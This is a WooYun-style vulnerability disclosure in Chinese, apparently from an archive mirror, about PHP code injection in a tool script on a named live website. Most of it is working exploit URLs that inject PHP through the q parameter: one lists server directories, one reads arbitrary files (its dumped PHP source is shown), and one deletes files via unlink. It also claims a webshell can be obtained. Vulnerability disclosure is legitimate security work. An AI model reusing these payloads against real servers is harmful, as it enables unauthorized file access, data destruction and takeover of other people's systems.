乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-12: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-12-27: 厂商已经主动忽略漏洞,细节向公众公开
代码未过滤敏感字符,导致远程加载PHP代码执行代码。
http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../
Array( [0] => . [1] => .. [2] => 123 [3] => 168 [4] => 20130720195947.rar [5] => 2345 [6] => 360buy-union.txt [7] => 82051.txt [8] => HTML [9] => Plugins [10] => Top-verification.html [11] => _WU8G02t5Wuoiw5yWg4Cfd4wz5g.html [12] => a [13] => about [14] => ad [15] => api [16] => aspnet_client [17] => baidu_verify_729eGdarRG.html [18] => baidunews.xml [19] => bbs [20] => bdsitemap.txt [21] => bdunion.txt [22] => cert [23] => check.txt [24] => css [25] => en [26] => favicon.ico [27] => google59c3fe0e4120c597.html [28] => gs_union_verify_file.html [29] => home [30] => images [31] => include [32] => index [33] => index.html [34] => index.php [35] => info [36] => kLtLsTFNw_UD3XyZOfqZvQrBNHc.html [37] => license.txt [38] => main [39] => mainindex.html [40] => member [41] => netbsdede [42] => netbsmain.html [43] => news [44] => plus [45] => qqmail_domain_verify.txt [46] => robots.php [47] => robots.txt [48] => robots2.txt [49] => shop [50] => shuiyin.jpg [51] => sitemap.html [52] => sitemap.xml [53] => sitemaps.xml [54] => special [55] => tags.php [56] => templets [57] => tool [58] => uc_client [59] => upload.php [60] => uploads [61] => version.inc.php)1
可以查看任意文件
Array( [0] => <?php [1] => function is_domain($domain){ [2] => if(preg_match("/^([0-9a-z\-]{1,}\.)?[0-9a-z\-]{2,}\.([0-9a-z\-]{2,}\.)?[a-z]{2,}$/i", $domain)) { [3] => return true; [4] => }else{ [5] => return false; [6] => } [7] => } [8] => [9] => function get_content($url){ [10] => if(!strpos($url, '://')) return 'Invalid URI'; [11] => $content = ''; [12] => if(ini_get('allow_url_fopen')){ [13] => $cnt=0; [14] => while($cnt < 15 && ($content=@file_get_contents($url))===FALSE) $cnt++; [15] => } [16] => elseif(function_exists('curl_init')){ [17] => $handle = curl_init(); [18] => curl_setopt($handle, CURLOPT_URL, $url); [19] => curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 5); [20] => curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1); [21] => curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 0); [22] => $content = curl_exec($handle); [23] => curl_close($handle); [24] => } [25] => elseif(function_exists('fsockopen')){ [26] => $urlinfo = parse_url($url); [27] => $host = $urlinfo['host']; [28] => $str = explode($host, $url); [29] => $uri = $str[1]; [30] => unset($urlinfo, $str); [31] => $content = ''; [32] => $fp = fsockopen($host, 80, $errno, $errstr, 30); [33] => if(!$fp){ [34] => $content = 'Can Not Open Socket...'; [35] => } [36] => else{ [37] => $out = "GET $uri HTTP/1.1\r\n"; [38] => $out.= "Host: $host \r\n"; [39] => $out.= "Accept: */*\r\n"; [40] => $out.= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n"; [41] => $out.= "Connection: Close\r\n\r\n"; [42] => fputs($fp, $out); [43] => while (!feof($fp)){ [44] => $content .= fgets($fp, 4069); [45] => } [46] => fclose($fp); [47] => } [48] => } [49] => if(empty($content)) $content = '无法打开该链接!'; [50] => return $content; [51] => } [52] => ?>)
view-source:http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../tool/global.php
可以删除文件
删除文件,参数n为文件名
http://www.netbs.cn/yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../xxxx.txt还可以直接获取webshell
如上所示
过滤敏感字符!
未能联系到厂商或者厂商积极拒绝